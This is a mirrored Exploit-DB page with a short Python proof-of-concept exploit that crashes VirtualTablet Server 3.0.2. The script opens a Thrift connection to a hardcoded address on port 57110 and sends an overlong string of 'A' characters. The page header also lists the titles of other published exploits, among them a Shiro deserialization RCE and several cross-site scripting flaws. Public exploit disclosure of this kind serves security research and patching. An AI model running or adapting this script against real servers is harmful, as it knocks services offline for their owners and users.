exploit-db-mirror/exploits/windows/dos/48402.py
Offensive Security 9de5d20d13 DB: 2020-05-02
9 changes to exploits/shellcodes

VirtualTablet Server 3.0.2 - Denial of Service (PoC)

Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)
ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting
Online Scheduling System 1.0 - Persistent Cross-Site Scripting
php-fusion 9.03.50 - Persistent Cross-Site Scripting
Super Backup 2.0.5 for iOS - Directory Traversal
HardDrive 2.1 for iOS - Arbitrary File Upload
Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)
Online Scheduling System 1.0 - Authentication Bypass
2020-05-02 05:01:58 +00:00

28 lines
No EOL
803 B
Python
Executable file

# Title: VirtualTablet Server 3.0.2 - Denial of Service (PoC)
# Author: Dolev Farhi
# Date: 2020-04-29
# Vulnerable version: 3.0.2 (14)
# Link: http://www.sunnysidesoft.com/
# CVE: N/A
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from pygen.example import Example
host = '192.168.1.1'
port = 57110
try:
transport = TSocket.TSocket(host, port)
transport = TTransport.TBufferedTransport(transport)
protocol = TBinaryProtocol.TBinaryProtocol(transport)
client = Example.Client(protocol)
transport.open()
client.send_say('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
transport.close()
except Thrift.TException as tx:
print(tx.message)